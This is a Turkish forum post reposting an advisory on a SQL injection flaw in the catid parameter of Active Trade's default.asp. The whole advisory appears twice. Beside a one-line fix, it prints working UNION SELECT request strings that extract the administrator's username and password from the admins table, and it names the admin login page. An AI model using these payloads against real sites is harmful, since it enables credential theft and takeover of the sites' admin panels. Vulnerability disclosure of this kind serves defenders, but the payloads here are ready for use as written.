2
EXE RANK
zαzα
Fexe Kullanıcısı
Active Trade catid SQL Injection açığı CyberGhost tarafından rapor edilen açık SQL sorgu ekleme saldırılarına izin veriyor.
default.aspi dosyasında catid parametresine eklenen girişler doğru olarak kontrol edilmiyor. Bu sayede SQL sorgularında değişiklik yaparak istenilen SQL kodunu çalıştırmak mümkün olabiliyor.
Açığın 2 sürümünde olduğu rapor edildi fakat diğer sürümler de etkileniyor olabilir.
Çözüm:
Kaynak kodunda düzenleme yaparak doğru filtrelemenin yapıldığına emin olun.
Ref:
#Title : Active Trade Remote SQL Injectioni Vulnerability
#Author : CyberGhost
#Demo Page : Active Trade
#Script Page : http://www.activewebsoftwares.com/pr...x?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%2 0adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20 adminid=1
#Admin Login : /admin.asp
====================================
default.aspi dosyasında catid parametresine eklenen girişler doğru olarak kontrol edilmiyor. Bu sayede SQL sorgularında değişiklik yaparak istenilen SQL kodunu çalıştırmak mümkün olabiliyor.
Açığın 2 sürümünde olduğu rapor edildi fakat diğer sürümler de etkileniyor olabilir.
Çözüm:
Kaynak kodunda düzenleme yaparak doğru filtrelemenin yapıldığına emin olun.
Ref:
#Title : Active Trade Remote SQL Injectioni Vulnerability
#Author : CyberGhost
#Demo Page : Active Trade
#Script Page : http://www.activewebsoftwares.com/pr...x?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%2 0adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20 adminid=1
#Admin Login : /admin.asp
====================================